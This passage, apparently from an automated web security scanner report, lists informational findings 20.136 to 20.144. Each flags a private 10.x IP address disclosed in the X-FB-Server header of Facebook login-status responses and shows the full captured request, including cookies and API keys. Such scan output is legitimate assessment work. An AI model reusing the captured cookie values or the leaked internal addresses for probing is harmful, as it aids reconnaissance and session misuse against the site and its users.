aol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df161ef1454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff8e71479%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a2894a34&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f293a15c18&origin=http%3A%2F%2Faol.sportingnews.com%2Ff8e71479&relation=parent&transport=postmessage&frame=f2a2894a34
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.155.48
X-Cnection: close
Date: Thu, 05 May 2011 01:34:47 GMT
Content-Length: 0


20.136. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.81.41

Request

GET /extern/login_status.php?api_key=2431184420&app_id=2431184420&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34592c72%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3dc7d085%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e9a2d398%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f169a45c%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2845949c%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff1558e56e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c2391e1c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1f169a45c&origin=http%3A%2F%2Fwww.citysbest.com%2Ff1558e56e4&relation=parent&transport=postmessage&frame=f3c2391e1c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.81.41
X-Cnection: close
Date: Thu, 05 May 2011 00:58:24 GMT
Content-Length: 0


20.137. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.104.125

Request

GET /extern/login_status.php?api_key=47c6f1cfdf79ef9c669f1beb89b3e598&app_id=47c6f1cfdf79ef9c669f1beb89b3e598&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4b99ee0%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe25b524c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27fcb7b5c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38b20c288%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37906661%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.104.125
X-Cnection: close
Date: Thu, 05 May 2011 01:09:56 GMT
Content-Length: 0


20.138. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.189.73

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc47623d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db8869fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32fc44f88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df164452bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22c13e9ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff154677df%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff9c12348&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f164452bc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff154677df&relation=parent&transport=postmessage&frame=ff9c12348
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.73
X-Cnection: close
Date: Thu, 05 May 2011 02:11:06 GMT
Content-Length: 0


20.139. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.91.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3fbffbfc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df120ad6008%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74afbf1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21669b4d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f2795bbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff4ba24b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1672294&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21669b4d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff4ba24b8&relation=parent&transport=postmessage&frame=f2a1672294
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.91.77
X-Cnection: close
Date: Thu, 05 May 2011 01:51:30 GMT
Content-Length: 0


20.140. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.235.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1150e2cb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37f70eb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3310325ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12f94ebd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1909607f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3193e22c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b3af62bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f12f94ebd4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3193e22c&relation=parent&transport=postmessage&frame=f3b3af62bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.235.25
X-Cnection: close
Date: Thu, 05 May 2011 01:45:56 GMT
Content-Length: 0


20.141. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.96.57

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32ecfb254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f3da472%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db47379c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29b286be8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12f83208c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c4f82c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285c04e38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f29b286be8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1c4f82c7&relation=parent&transport=postmessage&frame=f285c04e38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.57
X-Cnection: close
Date: Thu, 05 May 2011 01:21:05 GMT
Content-Length: 0


20.142. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.170.50

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cfff3088%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d36d1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28e8c7a84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16e298c6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21fa44b14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3131d8214%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ecaddae&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16e298c6c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3131d8214&relation=parent&transport=postmessage&frame=f3ecaddae
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.50
X-Cnection: close
Date: Thu, 05 May 2011 01:30:35 GMT
Content-Length: 0


20.143. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.68.33

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cabb93c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e88af65%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2776b41cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ac84726c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df366503768%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff14c209fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5a2f5d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ac84726c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff14c209fd&relation=parent&transport=postmessage&frame=f5a2f5d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.68.33
X-Cnection: close
Date: Thu, 05 May 2011 01:48:56 GMT
Content-Length: 0


20.144. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.104.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2df207e2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c8c57658%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11e5fa634%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df180e268e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7d68e158%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
